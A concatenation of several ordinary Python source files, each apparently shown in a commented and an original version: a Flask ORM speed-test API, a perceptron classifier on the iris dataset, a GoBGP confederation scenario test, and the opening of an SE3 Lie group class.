"username": "2d89c7fc-5ebd-4e63-aaea-086b254a9b1a",
"email": "2d89c7fc-5ebd-4e63-aaea-086b254a9b1a"
}
},
{
"id": 7,
"name": "89660999-f64a-4318-b001-696c2fbf7bdb",
"amount": 644680468,
"user": {
"id": 27166,
"username": "89660999-f64a-4318-b<PASSWORD>-<PASSWORD>bdb",
"email": "89660999-f64a-4318-b001-696c2fbf7bdb"
}
},
{
"id": 8,
"name": "a4e5c979-f15c-48fe-b3d5-2885af25e39f",
"amount": 210861397,
"user": {
"id": 27167,
"username": "a4e5c979-f15c-48fe-b3d5-<PASSWORD>",
"email": "a4e5c979-f15c-48fe-b3d5-2885af25e39f"
}
},
{
"id": 9,
"name": "1e95646c-db4b-4465-888a-dd832cfef84c",
"amount": 306301242,
"user": {
"id": 27168,
"username": "1e95646c-db4b-4465-888a-dd832cfef84c",
"email": "1e95646c-db4b-4465-888a-dd832cfef84c"
}
},
{
"id": 10,
"name": "ebbd06c9-a33b-44e1-9736-8ff2d1ac868d",
"amount": 890229987,
"user": {
"id": 27169,
"username": "ebbd06c9-a33b-44e1-9736-8ff2d1ac868d",
"email": "ebbd06c9-a33b-44e1-9736-8ff2d1ac868d"
}
}
]
def gibbs(N=100, thin=100):
x = 0
y = 0
for i in range(N):
for j in range(thin):
x = random.gammavariate(3, 1.0 / (y * y + 4))
y = random.gauss(1.0 / (x + 1), 1.0 / math.sqrt(2 * x + 2))
class SimpleList(Resource):
def get(self):
data = DATA
return data
class HeavyCodeList(Resource):
def get(self):
data = gibbs()
return { "action": "done" }
class SelectList(Resource):
def get(self):
customers = SpeedtestCustomer.query.filter().limit(100)
user_schema = CustomerSchema(many=True)
return user_schema.dump(customers)
class Count(Resource):
def get(self):
count = SpeedtestCustomer.query.count()
return { "count": count }
class PaginatedList(Resource):
def get(self, page=1):
per_page = 100
customers = SpeedtestCustomer.query.filter().paginate(page,per_page,error_out=False)
user_schema = CustomerSchema(many=True)
return user_schema.dump(customers.items)
class Aggregation(Resource):
def get(self):
amount = db.session.query(func.avg(SpeedtestCustomer.amount))
return {
"amount": amount,
"random": random.randint(10000,1000000)
}
class Create(Resource):
def post(self):
user = AuthUser(
username=str(uuid.uuid4()),
first_name=str(request.json['first_name'])
)
db.session.add(user)
db.session.commit()
return {"created": True}
class Save(Resource):
def put(self):
user = AuthUser.query.filter_by().first()
user.last_name = request.json['last_name']
db.session.commit()
return { "saved": True }
class Update(Resource):
def put(self):
user = AuthUser.query.filter_by(id=self.user_id).update(dict(last_name=request.json['last_name']))
db.session.commit()
return { "updated": True }
class OrmSpeedTest(Command):
user_id = 1
def get_100_rec(self):
customers = SpeedtestCustomer.query.filter().limit(100)
def count_rec(self):
count = SpeedtestCustomer.query.count()
def paginate_100_rec(self):
per_page = 100
page = 1
customers = SpeedtestCustomer.query.filter().paginate(page,per_page,error_out=False)
def aggregation(self):
amount = SpeedtestCustomer.query.with_entities(func.avg(SpeedtestCustomer.amount))[0]
def crate_rec(self):
user = AuthUser(
username=uuid.uuid4(),
first_name="speed_test_flask"
)
db.session.add(user)
db.session.commit()
def save_rec(self):
user = AuthUser.query.first()
user.last_name = "speed_test_flask_7"
db.session.merge(user)
db.session.commit()
def update_rec(self):
user = AuthUser.query.filter_by(id=self.user_id).update(dict(last_name="speed_test_flask_5"))
db.session.commit()
def run(self):
user = AuthUser.query.first()
rotation = 1000
self.user_id = user.id
print ("select:", timeit.Timer(self.get_100_rec).timeit(rotation))
print ("count:", timeit.Timer(self.count_rec).timeit(rotation))
print ("paginate_100_rec:", timeit.Timer(self.paginate_100_rec).timeit(rotation))
print ("aggregation:", timeit.Timer(self.aggregation).timeit(rotation))
print ("crate_rec:", timeit.Timer(self.crate_rec).timeit(rotation))
print ("save_rec:", timeit.Timer(self.save_rec).timeit(rotation))
print ("update_rec:", timeit.Timer(self.update_rec).timeit(rotation)) | flaskspeed/app/speedtest/views.py | from flask import request
from flask_restplus import Resource
from .models import AuthUser, SpeedtestCustomer
from .schemas import CustomerSchema, UserSchema
from sqlalchemy import func
import random, math
from app import db
import uuid
from flask_script import Command
import timeit
DATA = [
{
"id": 1,
"name": "260861f4-1008-49d3-87ef-dbd32b78fae7",
"amount": 958603672,
"user": {
"id": 27160,
"username": "260861f4-1<PASSWORD>-<PASSWORD>-87ef-<PASSWORD>fae7",
"email": "260861f4-1008-49d3-87ef-dbd32b78fae7"
}
},
{
"id": 2,
"name": "e38b4cdc-b2c9-4452-a9ed-c326c2e7f998",
"amount": 505838560,
"user": {
"id": 27161,
"username": "e38b4cdc-b2c9-4452-a9ed-c326c2e7f998",
"email": "e38b4cdc-b2c9-4452-a9ed-c326c2e7f998"
}
},
{
"id": 3,
"name": "f6d80e74-e340-49c3-a40b-02d7f1c7f874",
"amount": 590426501,
"user": {
"id": 27162,
"username": "f6d80e74-e340-49c3-a40b-02d7f1c7f874",
"email": "f6d80e74-e340-49c3-a40b-02d7f1c7f874"
}
},
{
"id": 4,
"name": "72188cda-2901-4e8c-92d2-f6a78a74cb1c",
"amount": 733092617,
"user": {
"id": 27163,
"username": "72188cda-<PASSWORD>-<PASSWORD>",
"email": "72188cda-2901-4e8c-92d2-f6a78a74cb1c"
}
},
{
"id": 5,
"name": "4c6f778b-8f16-489c-bb52-4bea615af711",
"amount": 395133510,
"user": {
"id": 27164,
"username": "4c6f778b-8f16-489c-bb52-4bea615af711",
"email": "4c6f778b-8f16-489c-bb52-4bea615af711"
}
},
{
"id": 6,
"name": "2d89c7fc-5ebd-4e63-aaea-086b254a9b1a",
"amount": 4636042,
"user": {
"id": 27165,
"username": "2d89c7fc-5ebd-4e63-aaea-086b254a9b1a",
"email": "2d89c7fc-5ebd-4e63-aaea-086b254a9b1a"
}
},
{
"id": 7,
"name": "89660999-f64a-4318-b001-696c2fbf7bdb",
"amount": 644680468,
"user": {
"id": 27166,
"username": "89660999-f64a-4318-b<PASSWORD>-<PASSWORD>bdb",
"email": "89660999-f64a-4318-b001-696c2fbf7bdb"
}
},
{
"id": 8,
"name": "a4e5c979-f15c-48fe-b3d5-2885af25e39f",
"amount": 210861397,
"user": {
"id": 27167,
"username": "a4e5c979-f15c-48fe-b3d5-<PASSWORD>",
"email": "a4e5c979-f15c-48fe-b3d5-2885af25e39f"
}
},
{
"id": 9,
"name": "1e95646c-db4b-4465-888a-dd832cfef84c",
"amount": 306301242,
"user": {
"id": 27168,
"username": "1e95646c-db4b-4465-888a-dd832cfef84c",
"email": "1e95646c-db4b-4465-888a-dd832cfef84c"
}
},
{
"id": 10,
"name": "ebbd06c9-a33b-44e1-9736-8ff2d1ac868d",
"amount": 890229987,
"user": {
"id": 27169,
"username": "ebbd06c9-a33b-44e1-9736-8ff2d1ac868d",
"email": "ebbd06c9-a33b-44e1-9736-8ff2d1ac868d"
}
}
]
def gibbs(N=100, thin=100):
    """CPU-burning Gibbs sampler used as a synthetic heavy workload.

    Advances a bivariate (gamma, gaussian) chain for N outer steps of
    *thin* inner updates each; the samples themselves are discarded.
    """
    x = y = 0
    for _ in range(N):
        for _ in range(thin):
            x = random.gammavariate(3, 1.0 / (y * y + 4))
            y = random.gauss(1.0 / (x + 1), 1.0 / math.sqrt(2 * x + 2))
class SimpleList(Resource):
    """Serve the static fixture list as-is (baseline: no ORM, no compute)."""

    def get(self):
        return DATA
class HeavyCodeList(Resource):
    """Run the synthetic Gibbs workload (CPU-bound benchmark endpoint)."""

    def get(self):
        # gibbs() is executed purely for its CPU cost; it returns None,
        # so the previous `data = gibbs()` binding was dead and is dropped.
        gibbs()
        return { "action": "done" }
class SelectList(Resource):
    """Fetch 100 customer rows and serialize them (plain SELECT benchmark)."""

    def get(self):
        # NOTE(review): .filter() with no criteria is a no-op -- presumably
        # kept so all benchmark endpoints share the same query shape.
        customers = SpeedtestCustomer.query.filter().limit(100)
        user_schema = CustomerSchema(many=True)
        return user_schema.dump(customers)
class Count(Resource):
    """Report the total number of customer rows (COUNT(*) benchmark)."""

    def get(self):
        return {"count": SpeedtestCustomer.query.count()}
class PaginatedList(Resource):
    """Serve customers 100 per page (pagination benchmark)."""

    def get(self, page=1):
        per_page = 100
        # Positional paginate(page, per_page, ...) matches the
        # Flask-SQLAlchemy 2.x signature; error_out=False yields an empty
        # page instead of a 404 for out-of-range page numbers.
        customers = SpeedtestCustomer.query.filter().paginate(page,per_page,error_out=False)
        user_schema = CustomerSchema(many=True)
        return user_schema.dump(customers.items)
class Aggregation(Resource):
    """Return the average customer amount plus a random marker value."""

    def get(self):
        # BUGFIX: db.session.query(...) is a Query object, which is not
        # JSON-serializable; .scalar() executes it and extracts the single
        # AVG value (matching OrmSpeedTest.aggregation's materialization).
        amount = db.session.query(func.avg(SpeedtestCustomer.amount)).scalar()
        return {
            "amount": amount,
            "random": random.randint(10000, 1000000)
        }
class Create(Resource):
    """INSERT benchmark: create a user with a random unique username."""

    def post(self):
        user = AuthUser(
            # uuid4 keeps the username unique across benchmark runs.
            username=str(uuid.uuid4()),
            first_name=str(request.json['first_name'])
        )
        db.session.add(user)
        db.session.commit()
        return {"created": True}
class Save(Resource):
    """Load the first user, mutate its last name in place, and commit."""

    def put(self):
        first_user = AuthUser.query.filter_by().first()
        first_user.last_name = request.json['last_name']
        db.session.commit()
        return { "saved": True }
class Update(Resource):
    """Bulk-update the last name of one user via Query.update()."""

    # BUG FIX: the original read self.user_id, which Resource never defines
    # (it only exists on OrmSpeedTest), so every PUT raised AttributeError.
    # Default it here to preserve the apparent intended target row.
    user_id = 1

    def put(self):
        AuthUser.query.filter_by(id=self.user_id).update(dict(last_name=request.json['last_name']))
        db.session.commit()
        return { "updated": True }
class OrmSpeedTest(Command):
    """Flask-Script command that micro-benchmarks common SQLAlchemy ORM operations.

    Each ``*_rec`` method performs one ORM operation; ``run`` times each of
    them with ``timeit`` over a fixed repetition count and prints the totals.
    """
    # Placeholder; run() overwrites this with the id of the first AuthUser row.
    user_id = 1
    def get_100_rec(self):
        # NOTE(review): Query.limit() only builds a query object and nothing
        # iterates it here, so this likely never executes SQL -- verify intent.
        customers = SpeedtestCustomer.query.filter().limit(100)
    def count_rec(self):
        # SELECT COUNT(*) over the whole table (executes immediately).
        count = SpeedtestCustomer.query.count()
    def paginate_100_rec(self):
        # Fetch page 1 with 100 rows per page (pagination executes the query).
        per_page = 100
        page = 1
        customers = SpeedtestCustomer.query.filter().paginate(page,per_page,error_out=False)
    def aggregation(self):
        # Average of the amount column; indexing with [0] executes the query.
        amount = SpeedtestCustomer.query.with_entities(func.avg(SpeedtestCustomer.amount))[0]
    def crate_rec(self):
        # Insert one row per call ("crate" is presumably a typo for "create";
        # the name is kept because run() refers to it).
        user = AuthUser(
            username=uuid.uuid4(),
            first_name="speed_test_flask"
        )
        db.session.add(user)
        db.session.commit()
    def save_rec(self):
        # Mutate the first user, then merge and commit the change.
        user = AuthUser.query.first()
        user.last_name = "speed_test_flask_7"
        db.session.merge(user)
        db.session.commit()
    def update_rec(self):
        # Bulk UPDATE targeting a single row by primary key.
        user = AuthUser.query.filter_by(id=self.user_id).update(dict(last_name="speed_test_flask_5"))
        db.session.commit()
    def run(self):
        # Time each operation `rotation` times and print total seconds.
        user = AuthUser.query.first()
        rotation = 1000
        self.user_id = user.id
        print ("select:", timeit.Timer(self.get_100_rec).timeit(rotation))
        print ("count:", timeit.Timer(self.count_rec).timeit(rotation))
        print ("paginate_100_rec:", timeit.Timer(self.paginate_100_rec).timeit(rotation))
        print ("aggregation:", timeit.Timer(self.aggregation).timeit(rotation))
        print ("crate_rec:", timeit.Timer(self.crate_rec).timeit(rotation))
        print ("save_rec:", timeit.Timer(self.save_rec).timeit(rotation))
print ("update_rec:", timeit.Timer(self.update_rec).timeit(rotation)) | 0.410166 | 0.156041 |
import logging
import argparse
import numpy as np
from sklearn.datasets import load_iris
from sklearn.model_selection import train_test_split
from sklearn.metrics import classification_report, accuracy_score
logging.basicConfig(level=logging.INFO, format='%(asctime)s %(levelname)s %(filename)s:%(lineno)s - %(message)s')
def load_data():
    """Load iris, drop class 1 so the task is binary, relabel to -1/+1, split 80/20.

    Returns:
        Tuple ``(x_train, y_train, x_test, y_test)`` of numpy arrays.
    """
    iris = load_iris()
    keep = iris.target != 1  # keep classes 0 and 2 only
    features = iris.data[keep]
    labels = iris.target[keep] - 1  # 0 -> -1, 2 -> +1
    x_train, x_test, y_train, y_test = train_test_split(features, labels, test_size=0.2)
    logging.info('x_train: %s, y_train: %s, x_test: %s, y_test: %s', x_train.shape, y_train.shape, x_test.shape, y_test.shape)
    return x_train, y_train, x_test, y_test
class Perceptron(object):
    """Primal-form perceptron updated one (mis)classified sample at a time."""

    def __init__(self, x_train, y_train, input_dim=4, alpha=0.01):
        self.input_dim = input_dim
        self.w = np.zeros((input_dim, ))  # weight vector
        self.b = 0                        # bias term
        self.alpha = alpha                # learning rate
        self.x_train = x_train
        self.y_train = y_train

    def train(self, xi):
        """Apply one perceptron update using the training sample at index *xi*."""
        sample, label = self.x_train[xi], self.y_train[xi]
        # Functional margin; non-positive means the sample is misclassified.
        margin = label * (np.dot(sample, self.w) + self.b)
        if margin <= 0:
            self.w += self.alpha * label * sample
            self.b += self.alpha * label

    def pred(self, x):
        """Return the raw decision value(s) w.x + b."""
        logging.info('w: %s', self.w)
        return np.dot(x, self.w) + self.b
class PerceptronDual(object):
    """Dual-form perceptron: per-sample multipliers plus a precomputed Gram matrix."""

    def __init__(self, x_train, y_train, input_dim=4, alpha=0.01):
        self.input_dim = input_dim
        self.num_train = len(x_train)
        self.a = np.zeros((self.num_train, ))  # per-sample multipliers
        self.b = 0
        self.alpha = alpha
        self.x_train = x_train
        self.y_train = y_train
        # gram[i][j] = y_i * <x_i, x_j>, computed once up front.
        self.gram = np.zeros((self.num_train, self.num_train))
        for i, xi in enumerate(x_train):
            for j, xj in enumerate(x_train):
                self.gram[i][j] = np.dot(xi, xj) * y_train[i]

    def train(self, xi):
        """Apply one dual update using the training sample at index *xi*."""
        label = self.y_train[xi]
        score = self.b
        for j in range(self.num_train):
            score += self.gram[j][xi] * self.a[j]
        if label * score <= 0:
            self.a[xi] += self.alpha
            self.b += self.alpha * label

    def pred(self, x):
        """Recover w from the dual variables and return w.x + b."""
        w = np.sum(self.a.reshape(-1, 1) * self.x_train * self.y_train.reshape(-1, 1), axis=0)
        logging.info('w: %s', w)
        return np.dot(x, w) + self.b
def main():
    """Train a perceptron (primal or dual) on binary iris and report accuracy."""
    parser = argparse.ArgumentParser()
    parser.add_argument('--mode', type=str, default='', help="")
    parser.add_argument('--alpha', type=float, default=0.01, help="learning rate")
    parser.add_argument('--epoch', type=int, default=10, help="epoch")
    args = parser.parse_args()
    logging.info('args: %s', args)
    x_train, y_train, x_test, y_test = load_data()
    # Peek at the first few training samples.
    for i, x in enumerate(x_train[:10]):
        print(i, x, y_train[i])
    model_cls = PerceptronDual if args.mode == 'dual' else Perceptron
    model = model_cls(x_train, y_train, input_dim=len(x_train[0]), alpha=args.alpha)
    for epoch in range(args.epoch):
        for idx in range(len(x_train)):
            model.train(idx)
        # Evaluate on the held-out split after every epoch.
        y_pred_v = model.pred(x_test)
        y_pred = np.sign(y_pred_v)
        acc = accuracy_score(y_test, y_pred)
        logging.info('epoch: %03d, accuracy: %s', epoch + 1, acc)
    logging.info('report')
    print(classification_report(y_test, y_pred))
if __name__ == "__main__":
main() | perceptron/p.py | import logging
import argparse
import numpy as np
from sklearn.datasets import load_iris
from sklearn.model_selection import train_test_split
from sklearn.metrics import classification_report, accuracy_score
logging.basicConfig(level=logging.INFO, format='%(asctime)s %(levelname)s %(filename)s:%(lineno)s - %(message)s')
def load_data():
iris = load_iris()
xs = iris.data
ys = iris.target
idx = ys != 1
xs = xs[idx]
ys = ys[idx] - 1
x_train, x_test, y_train, y_test = train_test_split(xs, ys, test_size=0.2)
logging.info('x_train: %s, y_train: %s, x_test: %s, y_test: %s', x_train.shape, y_train.shape, x_test.shape, y_test.shape)
return x_train, y_train, x_test, y_test
class Perceptron(object):
def __init__(self, x_train, y_train, input_dim=4, alpha=0.01):
self.input_dim = input_dim
self.w = np.zeros((input_dim, ))
self.b = 0
self.alpha = alpha
self.x_train = x_train
self.y_train = y_train
def train(self, xi):
x, y = self.x_train[xi], self.y_train[xi]
pred = y * (np.dot(x, self.w) + self.b)
if pred <= 0:
self.w += self.alpha * y * x
self.b += self.alpha * y
def pred(self, x):
logging.info('w: %s', self.w)
return np.dot(x, self.w) + self.b
class PerceptronDual(object):
def __init__(self, x_train, y_train, input_dim=4, alpha=0.01):
self.input_dim = input_dim
self.num_train = len(x_train)
self.a = np.zeros((self.num_train, ))
self.b = 0
self.alpha = alpha
self.gram = np.zeros((self.num_train, self.num_train))
self.x_train = x_train
self.y_train = y_train
for i, xi in enumerate(x_train):
for j, xj in enumerate(x_train):
self.gram[i][j] = np.dot(xi, xj) * y_train[i]
def train(self, xi):
y = self.y_train[xi]
s = self.b
for j in range(self.num_train):
s += self.gram[j][xi] * self.a[j]
pred = y * s
if pred <= 0:
self.a[xi] += self.alpha
self.b += self.alpha * y
def pred(self, x):
w = np.sum(self.a.reshape(-1, 1) * self.x_train * self.y_train.reshape(-1, 1), axis=0)
logging.info('w: %s', w)
return np.dot(x, w) + self.b
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--mode', type=str, default='', help="")
parser.add_argument('--alpha', type=float, default=0.01, help="learning rate")
parser.add_argument('--epoch', type=int, default=10, help="epoch")
args = parser.parse_args()
logging.info('args: %s', args)
x_train, y_train, x_test, y_test = load_data()
for i, x in enumerate(x_train[:10]):
print(i, x, y_train[i])
clazz = PerceptronDual if args.mode == 'dual' else Perceptron
model = clazz(x_train, y_train, input_dim=len(x_train[0]), alpha=args.alpha)
for epoch in range(args.epoch):
for i in range(len(x_train)):
model.train(i)
y_pred_v = model.pred(x_test)
y_pred = np.sign(y_pred_v)
acc = accuracy_score(y_test, y_pred)
logging.info('epoch: %03d, accuracy: %s', epoch + 1, acc)
logging.info('report')
p = classification_report(y_test, y_pred)
print(p)
if __name__ == "__main__":
main() | 0.657538 | 0.511656 |
import sys
import time
import unittest
import nose
from lib.noseplugin import OptionParser, parser_option
from lib import base
from lib.base import BGP_FSM_ESTABLISHED, local
from lib.gobgp import GoBGPContainer
from lib.quagga import QuaggaBGPContainer
class GoBGPTestBase(unittest.TestCase):
    """Scenario test: BGP confederation (RFC 5065) behavior of GoBGP vs Quagga.

    setUpClass builds the container topology drawn below, peers every router,
    and the tests then check AS_PATH handling and best-path selection across
    the confederation boundary.
    """

    def _check_global_rib_first(self, q, prefix, aspath):
        """Assert the first global-RIB entry for *prefix* on router *q* has *aspath*."""
        route = q.get_global_rib(prefix)[0]
        self.assertListEqual(aspath, route['aspath'])

    @classmethod
    def setUpClass(cls):
        # +-----Confederation(AS30)-----+
        # AS21 AS20 | +-AS65002-+ +-AS65001-+ | AS10
        # +----+ +----+ | | +-----+ | | +-----+ | | +----+
        # | q3 |---| q2 |--+-+-| g1 |-+-----+-| q11 |-+-+--| q1 |
        # +----+ +----+ | | +-----+ | | +-----+ | | +----+
        # | | | | | | | |
        # | | | | | | | |
        # | | | | | | | |
        # | | +-----+ | | +-----+ | |
        # | | | q22 | | | | q12 | | |
        # | | +-----+ | | +-----+ | |
        # | +---------+ +---------+ |
        # +-----------------------------+
        gobgp_ctn_image_name = parser_option.gobgp_image
        base.TEST_PREFIX = parser_option.test_prefix
        # Each sub-AS lists the other as a confederation member peer.
        bgp_conf_1 = {'global': {'confederation': {'config': {
            'enabled': True, 'identifier': 30, 'member-as-list': [65002]}}}}
        bgp_conf_2 = {'global': {'confederation': {'config': {
            'enabled': True, 'identifier': 30, 'member-as-list': [65001]}}}}
        g1 = GoBGPContainer(name='g1', asn=65002, router_id='192.168.2.1',
                            ctn_image_name=gobgp_ctn_image_name,
                            log_level=parser_option.gobgp_log_level,
                            bgp_config=bgp_conf_2)
        q1 = QuaggaBGPContainer(name='q1', asn=10, router_id='1.1.1.1')
        q2 = QuaggaBGPContainer(name='q2', asn=20, router_id='2.2.2.2')
        q3 = QuaggaBGPContainer(name='q3', asn=21, router_id='3.3.3.3')
        q11 = QuaggaBGPContainer(name='q11', asn=65001, router_id='192.168.1.1', bgpd_config=bgp_conf_1)
        q12 = QuaggaBGPContainer(name='q12', asn=65001, router_id='192.168.1.2', bgpd_config=bgp_conf_1)
        q22 = QuaggaBGPContainer(name='q22', asn=65002, router_id='192.168.2.2', bgpd_config=bgp_conf_2)
        ctns = [g1, q1, q2, q3, q11, q12, q22]
        cls.initial_wait_time = max(ctn.run() for ctn in ctns)
        time.sleep(cls.initial_wait_time)
        # External peerings use the confederation identifier (AS30) as the
        # remote AS; intra-confederation peerings use the member AS numbers.
        q1.add_peer(q11, remote_as=30)
        q11.add_peer(q1)
        q11.add_peer(q12)
        q12.add_peer(q11)
        g1.add_peer(q11)
        q11.add_peer(g1)
        g1.add_peer(q22)
        q22.add_peer(g1)
        g1.add_peer(q2)
        q2.add_peer(g1, remote_as=30)
        q3.add_peer(q2)
        q2.add_peer(q3)
        cls.gobgp = g1
        cls.quaggas = {'q1': q1, 'q2': q2, 'q3': q3, 'q11': q11, 'q12': q12, 'q22': q22}

    def test_01_neighbor_established(self):
        """Every BGP session in the topology must reach ESTABLISHED."""
        self.gobgp.wait_for(expected_state=BGP_FSM_ESTABLISHED, peer=self.quaggas['q11'])
        self.gobgp.wait_for(expected_state=BGP_FSM_ESTABLISHED, peer=self.quaggas['q22'])
        self.gobgp.wait_for(expected_state=BGP_FSM_ESTABLISHED, peer=self.quaggas['q2'])
        self.quaggas['q11'].wait_for(expected_state=BGP_FSM_ESTABLISHED, peer=self.quaggas['q1'])
        self.quaggas['q11'].wait_for(expected_state=BGP_FSM_ESTABLISHED, peer=self.quaggas['q12'])
        self.quaggas['q2'].wait_for(expected_state=BGP_FSM_ESTABLISHED, peer=self.quaggas['q3'])

    def test_02_route_advertise(self):
        """AS_CONFED_* segments must be visible inside, stripped outside, the confederation."""
        self.quaggas['q3'].add_route('10.0.0.0/24')
        time.sleep(self.initial_wait_time)
        routes = []
        # Poll for up to 60 seconds for the route to propagate to q1.
        for _ in range(60):
            routes = self.quaggas['q1'].get_global_rib('10.0.0.0/24')
            if routes:
                break
            time.sleep(1)
        self.assertFalse(len(routes) == 0)
        # Confirm AS_PATH in confederation is removed
        self._check_global_rib_first(self.quaggas['q1'], '10.0.0.0/24', [30, 20, 21])
        # Confirm AS_PATH in confederation is not removed
        self._check_global_rib_first(self.quaggas['q11'], '10.0.0.0/24', [65002, 20, 21])
        self._check_global_rib_first(self.quaggas['q22'], '10.0.0.0/24', [20, 21])

    def test_03_best_path(self):
        """The shorter external AS_PATH (ignoring AS_CONFED_* segments) must win."""
        self.quaggas['q1'].add_route('10.0.0.0/24')
        routes = []
        for _ in range(60):
            routes = self.gobgp.get_global_rib('10.0.0.0/24')
            if len(routes) == 1:
                if len(routes[0]['paths']) == 2:
                    break
            time.sleep(1)
        self.assertFalse(len(routes) != 1)
        self.assertFalse(len(routes[0]['paths']) != 2)
        # In g1, there are two routes to 10.0.0.0/24
        # confirm the route from q1 is selected as the best path
        # because it has shorter AS_PATH.
        # (AS_CONFED_* segments in AS_PATH is not counted)
        paths = routes[0]['paths']
        # BUG FIX: the original used assertTrue(paths[0]['aspath'], [65001, 10]),
        # which treats the expected list as the failure *message*, so the check
        # could never fail.  Compare the AS_PATH explicitly instead.
        self.assertListEqual([65001, 10], paths[0]['aspath'])
        # confirm the new best path is advertised
        self._check_global_rib_first(self.quaggas['q22'], '10.0.0.0/24', [65001, 10])
if __name__ == '__main__':
    output = local("which docker 2>&1 > /dev/null ; echo $?", capture=True)
    # BUG FIX: `int(output) is not 0` compared ints by identity; it only
    # happened to work because CPython caches small ints, and it raises a
    # SyntaxWarning on Python 3.8+.  Use a value comparison instead.
    if int(output) != 0:
        print("docker not found")
        sys.exit(1)
nose.main(argv=sys.argv, addplugins=[OptionParser()],
defaultTest=sys.argv[0]) | test/scenario_test/bgp_confederation_test.py |
import sys
import time
import unittest
import nose
from lib.noseplugin import OptionParser, parser_option
from lib import base
from lib.base import BGP_FSM_ESTABLISHED, local
from lib.gobgp import GoBGPContainer
from lib.quagga import QuaggaBGPContainer
class GoBGPTestBase(unittest.TestCase):
def _check_global_rib_first(self, q, prefix, aspath):
route = q.get_global_rib(prefix)[0]
self.assertListEqual(aspath, route['aspath'])
@classmethod
def setUpClass(cls):
# +-----Confederation(AS30)-----+
# AS21 AS20 | +-AS65002-+ +-AS65001-+ | AS10
# +----+ +----+ | | +-----+ | | +-----+ | | +----+
# | q3 |---| q2 |--+-+-| g1 |-+-----+-| q11 |-+-+--| q1 |
# +----+ +----+ | | +-----+ | | +-----+ | | +----+
# | | | | | | | |
# | | | | | | | |
# | | | | | | | |
# | | +-----+ | | +-----+ | |
# | | | q22 | | | | q12 | | |
# | | +-----+ | | +-----+ | |
# | +---------+ +---------+ |
# +-----------------------------+
gobgp_ctn_image_name = parser_option.gobgp_image
base.TEST_PREFIX = parser_option.test_prefix
bgp_conf_1 = {'global': {'confederation': {'config': {
'enabled': True, 'identifier': 30, 'member-as-list': [65002]}}}}
bgp_conf_2 = {'global': {'confederation': {'config': {
'enabled': True, 'identifier': 30, 'member-as-list': [65001]}}}}
g1 = GoBGPContainer(name='g1', asn=65002, router_id='192.168.2.1',
ctn_image_name=gobgp_ctn_image_name,
log_level=parser_option.gobgp_log_level,
bgp_config=bgp_conf_2)
q1 = QuaggaBGPContainer(name='q1', asn=10, router_id='1.1.1.1')
q2 = QuaggaBGPContainer(name='q2', asn=20, router_id='2.2.2.2')
q3 = QuaggaBGPContainer(name='q3', asn=21, router_id='3.3.3.3')
q11 = QuaggaBGPContainer(name='q11', asn=65001, router_id='192.168.1.1', bgpd_config=bgp_conf_1)
q12 = QuaggaBGPContainer(name='q12', asn=65001, router_id='192.168.1.2', bgpd_config=bgp_conf_1)
q22 = QuaggaBGPContainer(name='q22', asn=65002, router_id='192.168.2.2', bgpd_config=bgp_conf_2)
ctns = [g1, q1, q2, q3, q11, q12, q22]
cls.initial_wait_time = max(ctn.run() for ctn in ctns)
time.sleep(cls.initial_wait_time)
q1.add_peer(q11, remote_as=30)
q11.add_peer(q1)
q11.add_peer(q12)
q12.add_peer(q11)
g1.add_peer(q11)
q11.add_peer(g1)
g1.add_peer(q22)
q22.add_peer(g1)
g1.add_peer(q2)
q2.add_peer(g1, remote_as=30)
q3.add_peer(q2)
q2.add_peer(q3)
cls.gobgp = g1
cls.quaggas = {'q1': q1, 'q2': q2, 'q3': q3, 'q11': q11, 'q12': q12, 'q22': q22}
# test each neighbor state is turned establish
def test_01_neighbor_established(self):
self.gobgp.wait_for(expected_state=BGP_FSM_ESTABLISHED, peer=self.quaggas['q11'])
self.gobgp.wait_for(expected_state=BGP_FSM_ESTABLISHED, peer=self.quaggas['q22'])
self.gobgp.wait_for(expected_state=BGP_FSM_ESTABLISHED, peer=self.quaggas['q2'])
self.quaggas['q11'].wait_for(expected_state=BGP_FSM_ESTABLISHED, peer=self.quaggas['q1'])
self.quaggas['q11'].wait_for(expected_state=BGP_FSM_ESTABLISHED, peer=self.quaggas['q12'])
self.quaggas['q2'].wait_for(expected_state=BGP_FSM_ESTABLISHED, peer=self.quaggas['q3'])
def test_02_route_advertise(self):
self.quaggas['q3'].add_route('10.0.0.0/24')
time.sleep(self.initial_wait_time)
routes = []
for _ in range(60):
routes = self.quaggas['q1'].get_global_rib('10.0.0.0/24')
if routes:
break
time.sleep(1)
self.assertFalse(len(routes) == 0)
# Confirm AS_PATH in confederation is removed
self._check_global_rib_first(self.quaggas['q1'], '10.0.0.0/24', [30, 20, 21])
# Confirm AS_PATH in confederation is not removed
self._check_global_rib_first(self.quaggas['q11'], '10.0.0.0/24', [65002, 20, 21])
self._check_global_rib_first(self.quaggas['q22'], '10.0.0.0/24', [20, 21])
def test_03_best_path(self):
self.quaggas['q1'].add_route('10.0.0.0/24')
routes = []
for _ in range(60):
routes = self.gobgp.get_global_rib('10.0.0.0/24')
if len(routes) == 1:
if len(routes[0]['paths']) == 2:
break
time.sleep(1)
self.assertFalse(len(routes) != 1)
self.assertFalse(len(routes[0]['paths']) != 2)
# In g1, there are two routes to 10.0.0.0/24
# confirm the route from q1 is selected as the best path
# because it has shorter AS_PATH.
# (AS_CONFED_* segments in AS_PATH is not counted)
paths = routes[0]['paths']
self.assertTrue(paths[0]['aspath'], [65001, 10])
# confirm the new best path is advertised
self._check_global_rib_first(self.quaggas['q22'], '10.0.0.0/24', [65001, 10])
if __name__ == '__main__':
output = local("which docker 2>&1 > /dev/null ; echo $?", capture=True)
if int(output) is not 0:
print("docker not found")
sys.exit(1)
nose.main(argv=sys.argv, addplugins=[OptionParser()],
defaultTest=sys.argv[0]) | 0.267504 | 0.195172 |
import random
import math
from functools import cached_property
import numpy as np
import numpy.typing as npt
from liegroups.base import (
LieGroupBase,
Adjoint,
Jacobian,
OptionalJacobian,
Tangent,
Vector,
eps,
)
from liegroups.so3 import SO3
from liegroups.util import normalize_range, norm, uniform_sampling_n_ball_muller, clip
class SE3(LieGroupBase):
    """The SE(3) Lie group: rigid-body transformations (rotation + translation) in 3-D.

    Elements are stored as ``(x, y, z, theta1, theta2, theta3)`` where the
    theta vector is an axis-angle (rotation-vector) parameterization of the
    rotation part.  NOTE(review): several docstrings below referenced SE2/SO2
    and their equation numbers -- they appear copied from the SE2
    implementation; the equation numbers have been left as found and should
    be confirmed against the reference paper.
    """
    dof = 6  # degrees of freedom of the tangent space
    dim = 3  # dimension of the space the group acts on
    def __init__(
        self, x: float, y: float, z: float, theta1: float, theta2: float, theta3: float
    ):
        """
